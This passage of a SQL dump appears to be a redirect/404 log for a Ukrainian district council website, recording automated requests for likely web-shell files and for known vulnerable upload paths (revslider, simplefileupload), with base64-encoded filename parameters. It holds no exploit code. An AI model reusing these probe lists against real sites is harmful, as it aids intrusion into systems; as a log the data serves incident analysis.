00:00:00',301),(29499,'http://malyn-rayrada.gov.ua/robots.txt.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:22:11','0000-00-00 00:00:00',301),(29500,'http://malyn-rayrada.gov.ua/jconfig.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:22:50','0000-00-00 00:00:00',301),(29501,'http://malyn-rayrada.gov.ua/media/reads.php?z3=dUJrcUo2LnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:23:10','0000-00-00 00:00:00',301),(29502,'http://malyn-rayrada.gov.ua/media/1ndex.php?z3=dUJrcUo2LnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:23:29','0000-00-00 00:00:00',301),(29503,'http://malyn-rayrada.gov.ua/sql_dump.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:23:55','0000-00-00 00:00:00',301),(29504,'http://malyn-rayrada.gov.ua/images/laj.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:24:21','0000-00-00 00:00:00',301),(29505,'http://malyn-rayrada.gov.ua/media/404.php?z3=dUJrcUo2LnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:25:08','0000-00-00 00:00:00',301),(29506,'http://malyn-rayrada.gov.ua/media/tmp.php?z3=dUJrcUo2LnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:25:40','0000-00-00 00:00:00',301),(29507,'http://malyn-rayrada.gov.ua/r3x.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:26:03','0000-00-00 00:00:00',301),(29508,'http://malyn-rayrada.gov.ua/images/stories/0day.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:26:34','0000-00-00 00:00:00',301),(29509,'http://malyn-rayrada.gov.ua/includes/u2p.php?z3=dUJrcUo2LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:26:53','0000-00-00 00:00:00',301),(29510,'http://malyn-rayrada.gov.ua/images/xxx.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:27:11','0000-00-00 00:00:00',301),(29511,'http://malyn-rayrada.gov.ua/al277.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:27:19','0000-00-00 00:00:00',301),(29512,'http://malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=dUJrcUo2LnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:27:48','0000-00-00 00:00:00',301),(29513,'http://malyn-rayrada.gov.ua/install.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:27:59','0000-00-00 00:00:00',301),(29514,'http://www.malyn-rayrada.gov.ua/images/1ndex.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:28:00','0000-00-00 00:00:00',301),(29515,'http://www.malyn-rayrada.gov.ua/sqlbak.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:28:16','0000-00-00 00:00:00',301),(29516,'http://malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=dUJrcUo2LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:28:19','0000-00-00 00:00:00',301),(29517,'http://malyn-rayrada.gov.ua/robot.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:28:28','0000-00-00 00:00:00',301),(29518,'http://www.malyn-rayrada.gov.ua/email.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:28:36','0000-00-00 00:00:00',301),(29519,'http://malyn-rayrada.gov.ua/wsdl.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:28:40','0000-00-00 00:00:00',301),(29520,'http://www.malyn-rayrada.gov.ua/functions.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:28:50','0000-00-00 00:00:00',301),(29521,'http://malyn-rayrada.gov.ua/goog1es.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:29:08','0000-00-00 00:00:00',301),(29522,'http://www.malyn-rayrada.gov.ua/cache/news.php?z3=M0M3a09oLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:29:37','0000-00-00 00:00:00',301),(29523,'http://malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=dUJrcUo2LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:29:38','0000-00-00 00:00:00',301),(29524,'http://www.malyn-rayrada.gov.ua/tmp.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',4,0,'2017-03-17 00:29:49','0000-00-00 00:00:00',301),(29525,'http://www.malyn-rayrada.gov.ua/shootme.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:30:03','0000-00-00 00:00:00',301),(29526,'http://malyn-rayrada.gov.ua/includes.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:30:26','0000-00-00 00:00:00',301),(29527,'http://malyn-rayrada.gov.ua/wp-main.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:30:38','0000-00-00 00:00:00',301),(29528,'http://www.malyn-rayrada.gov.ua/robots.txt.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:30:54','0000-00-00 00:00:00',301),(29529,'http://www.malyn-rayrada.gov.ua/jconfig.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:30:56','0000-00-00 00:00:00',301),(29530,'http://www.malyn-rayrada.gov.ua/media/reads.php?z3=M0M3a09oLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:31:17','0000-00-00 00:00:00',301),(29531,'http://www.malyn-rayrada.gov.ua/media/1ndex.php?z3=M0M3a09oLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:31:23','0000-00-00 00:00:00',301),(29532,'http://malyn-rayrada.gov.ua/images/al277.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:31:30','0000-00-00 00:00:00',301),(29533,'http://malyn-rayrada.gov.ua/webconfig.txt.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:31:42','0000-00-00 00:00:00',301),(29534,'http://www.malyn-rayrada.gov.ua/sql_dump.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:31:45','0000-00-00 00:00:00',301),(29535,'http://malyn-rayrada.gov.ua/cache/cachee.php?z3=dUJrcUo2LnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:32:03','0000-00-00 00:00:00',301),(29536,'http://www.malyn-rayrada.gov.ua/images/laj.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:32:13','0000-00-00 00:00:00',301),(29537,'http://malyn-rayrada.gov.ua/thumb.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:32:28','0000-00-00 00:00:00',301),(29538,'http://www.malyn-rayrada.gov.ua/media/404.php?z3=M0M3a09oLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:32:55','0000-00-00 00:00:00',301),(29539,'http://www.malyn-rayrada.gov.ua/media/tmp.php?z3=M0M3a09oLnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:33:15','0000-00-00 00:00:00',301),(29540,'http://malyn-rayrada.gov.ua/SessionController.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:33:24','0000-00-00 00:00:00',301),(29541,'http://www.malyn-rayrada.gov.ua/r3x.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:33:38','0000-00-00 00:00:00',301),(29542,'http://malyn-rayrada.gov.ua/maill.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:34:05','0000-00-00 00:00:00',301),(29543,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:34:29','0000-00-00 00:00:00',301),(29544,'http://malyn-rayrada.gov.ua/error-log.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:34:32','0000-00-00 00:00:00',301),(29545,'http://www.malyn-rayrada.gov.ua/includes/u2p.php?z3=M0M3a09oLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:34:40','0000-00-00 00:00:00',301),(29546,'http://www.malyn-rayrada.gov.ua/images/xxx.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:34:56','0000-00-00 00:00:00',301),(29547,'http://malyn-rayrada.gov.ua/authenticating.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:34:57','0000-00-00 00:00:00',301),(29548,'http://www.malyn-rayrada.gov.ua/al277.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:35:03','0000-00-00 00:00:00',301),(29549,'http://malyn-rayrada.gov.ua/google-assist.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:35:25','0000-00-00 00:00:00',301),(29550,'http://www.malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=M0M3a09oLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:35:33','0000-00-00 00:00:00',301),(29551,'http://malyn-rayrada.gov.ua/images/google-assist.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:35:37','0000-00-00 00:00:00',301),(29552,'http://www.malyn-rayrada.gov.ua/install.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:35:52','0000-00-00 00:00:00',301),(29553,'http://malyn-rayrada.gov.ua/images/robots.txt.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:36:08','0000-00-00 00:00:00',301),(29554,'http://www.malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=M0M3a09oLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:36:09','0000-00-00 00:00:00',301),(29555,'http://malyn-rayrada.gov.ua/elements.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:36:20','0000-00-00 00:00:00',301),(29556,'http://www.malyn-rayrada.gov.ua/robot.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:36:30','0000-00-00 00:00:00',301),(29557,'http://malyn-rayrada.gov.ua/xmlsrpc.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:36:32','0000-00-00 00:00:00',301),(29558,'http://www.malyn-rayrada.gov.ua/wsdl.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:36:38','0000-00-00 00:00:00',301),(29559,'http://malyn-rayrada.gov.ua/wp-cache.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:36:53','0000-00-00 00:00:00',301),(29560,'http://www.malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=M0M3a09oLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:37:25','0000-00-00 00:00:00',301),(29561,'http://malyn-rayrada.gov.ua/images/404.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:37:26','0000-00-00 00:00:00',301),(29562,'http://malyn-rayrada.gov.ua/images/head.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:37:54','0000-00-00 00:00:00',301),(29563,'http://malyn-rayrada.gov.ua/cache/support.php?z3=dUJrcUo2LnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:38:07','0000-00-00 00:00:00',301),(29564,'http://malyn-rayrada.gov.ua/RoseLeif.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:38:33','0000-00-00 00:00:00',301),(29565,'http://www.malyn-rayrada.gov.ua/wp-main.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:38:36','0000-00-00 00:00:00',301),(29566,'http://malyn-rayrada.gov.ua/Abbrevsprl.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:39:03','0000-00-00 00:00:00',301),(29567,'http://www.malyn-rayrada.gov.ua/images/al277.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:39:09','0000-00-00 00:00:00',301),(29568,'http://www.malyn-rayrada.gov.ua/webconfig.txt.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:39:24','0000-00-00 00:00:00',301),(29569,'http://malyn-rayrada.gov.ua/show.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:39:45','0000-00-00 00:00:00',301),(29570,'http://malyn-rayrada.gov.ua/images/defau1t.php?z3=dUJrcUo2LnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:40:01','0000-00-00 00:00:00',301),(29571,'http://malyn-rayrada.gov.ua/cli/40dd1d.php?z3=dUJrcUo2LnBocA==&z4=L2NsaS8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:40:11','0000-00-00 00:00:00',301),(29572,'http://www.malyn-rayrada.gov.ua/thumb.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:40:14','0000-00-00 00:00:00',301),(29573,'http://malyn-rayrada.gov.ua/infos.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:40:33','0000-00-00 00:00:00',301),(29574,'http://www.malyn-rayrada.gov.ua/SessionController.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:40:51','0000-00-00 00:00:00',301),(29575,'http://www.malyn-rayrada.gov.ua/maill.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:40:59','0000-00-00 00:00:00',301),(29576,'http://malyn-rayrada.gov.ua/cache/defau1t.php?z3=dUJrcUo2LnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:41:07','0000-00-00 00:00:00',301),(29577,'http://malyn-rayrada.gov.ua/bookmark.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:41:29','0000-00-00 00:00:00',301),(29578,'http://malyn-rayrada.gov.ua/configbak.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:41:50','0000-00-00 00:00:00',301),(29579,'http://malyn-rayrada.gov.ua/wp-data.php?z3=dUJrcUo2LnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:42:03','0000-00-00 00:00:00',301),(29580,'http://www.malyn-rayrada.gov.ua/error-log.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:42:04','0000-00-00 00:00:00',301),(29581,'http://www.malyn-rayrada.gov.ua/authenticating.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:42:17','0000-00-00 00:00:00',301),(29582,'http://malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:42:28','0000-00-00 00:00:00',301),(29583,'http://malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:42:37','0000-00-00 00:00:00',301),(29584,'http://www.malyn-rayrada.gov.ua/images/google-assist.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:42:48','0000-00-00 00:00:00',301),(29585,'http://malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:42:49','0000-00-00 00:00:00',301),(29586,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:43:08','0000-00-00 00:00:00',301),(29587,'http://www.malyn-rayrada.gov.ua/images/robots.txt.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:43:20','0000-00-00 00:00:00',301),(29588,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:43:26','0000-00-00 00:00:00',301),(29589,'http://www.malyn-rayrada.gov.ua/elements.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:43:30','0000-00-00 00:00:00',301),(29590,'http://malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:43:33','0000-00-00 00:00:00',301),(29591,'http://www.malyn-rayrada.gov.ua/xmlsrpc.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:43:46','0000-00-00 00:00:00',301),(29592,'http://www.malyn-rayrada.gov.ua/wp-cache.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:44:07','0000-00-00 00:00:00',301),(29593,'http://malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:44:08','0000-00-00 00:00:00',301),(29594,'http://www.malyn-rayrada.gov.ua/images/404.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:44:17','0000-00-00 00:00:00',301),(29595,'http://malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:44:28','0000-00-00 00:00:00',301),(29596,'http://www.malyn-rayrada.gov.ua/images/head.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:44:33','0000-00-00 00:00:00',301),(29597,'http://malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:44:50','0000-00-00 00:00:00',301),(29598,'http://www.malyn-rayrada.gov.ua/cache/support.php?z3=M0M3a09oLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:44:54','0000-00-00 00:00:00',301),(29599,'http://malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=dUJrcUo2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:45:08','0000-00-00 00:00:00',301),(29600,'http://www.malyn-rayrada.gov.ua/RoseLeif.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:45:16','0000-00-00 00:00:00',301),(29601,'http://malyn-rayrada.gov.ua/cache/list.php?z3=dUJrcUo2LnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:45:25','0000-00-00 00:00:00',301),(29602,'http://www.malyn-rayrada.gov.ua/Abbrevsprl.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:45:32','0000-00-00 00:00:00',301),(29603,'http://www.malyn-rayrada.gov.ua/show.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:45:38','0000-00-00 00:00:00',301),(29604,'http://www.malyn-rayrada.gov.ua/images/defau1t.php?z3=M0M3a09oLnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:46:08','0000-00-00 00:00:00',301),(29605,'http://www.malyn-rayrada.gov.ua/cli/40dd1d.php?z3=M0M3a09oLnBocA==&z4=L2NsaS8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:46:30','0000-00-00 00:00:00',301),(29606,'http://www.malyn-rayrada.gov.ua/infos.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:46:54','0000-00-00 00:00:00',301),(29607,'http://www.malyn-rayrada.gov.ua/cache/defau1t.php?z3=M0M3a09oLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:47:15','0000-00-00 00:00:00',301),(29608,'http://www.malyn-rayrada.gov.ua/bookmark.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:47:44','0000-00-00 00:00:00',301),(29609,'http://www.malyn-rayrada.gov.ua/configbak.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:48:02','0000-00-00 00:00:00',301),(29610,'http://www.malyn-rayrada.gov.ua/wp-data.php?z3=M0M3a09oLnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:48:23','0000-00-00 00:00:00',301),(29611,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:48:37','0000-00-00 00:00:00',301),(29612,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:49:04','0000-00-00 00:00:00',301),(29613,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:49:19','0000-00-00 00:00:00',301),(29614,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:49:26','0000-00-00 00:00:00',301),(29615,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:49:45','0000-00-00 00:00:00',301),(29616,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:50:00','0000-00-00 00:00:00',301),(29617,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:50:11','0000-00-00 00:00:00',301),(29618,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:50:32','0000-00-00 00:00:00',301),(29619,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:50:47','0000-00-00 00:00:00',301),(29620,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=M0M3a09oLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:51:46','0000-00-00 00:00:00',301),(29621,'http://www.malyn-rayrada.gov.ua/cache/list.php?z3=M0M3a09oLnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-17 00:51:47','0000-00-00 00:00:00',301),(29622,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/uBkqJ6.php',NULL,'','',1,0,'2017-03-17 00:53:23','0000-00-00 00:00:00',301),(29623,'http://malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/uBkqJ6.php',NULL,'','',1,0,'2017-03-17 00:53:36','0000-00-00 00:00:00',301),(29624,'http://malyn-rayrada.gov.ua/wp-content/uploads/uBkqJ6.php',NULL,'','',1,0,'2017-03-17 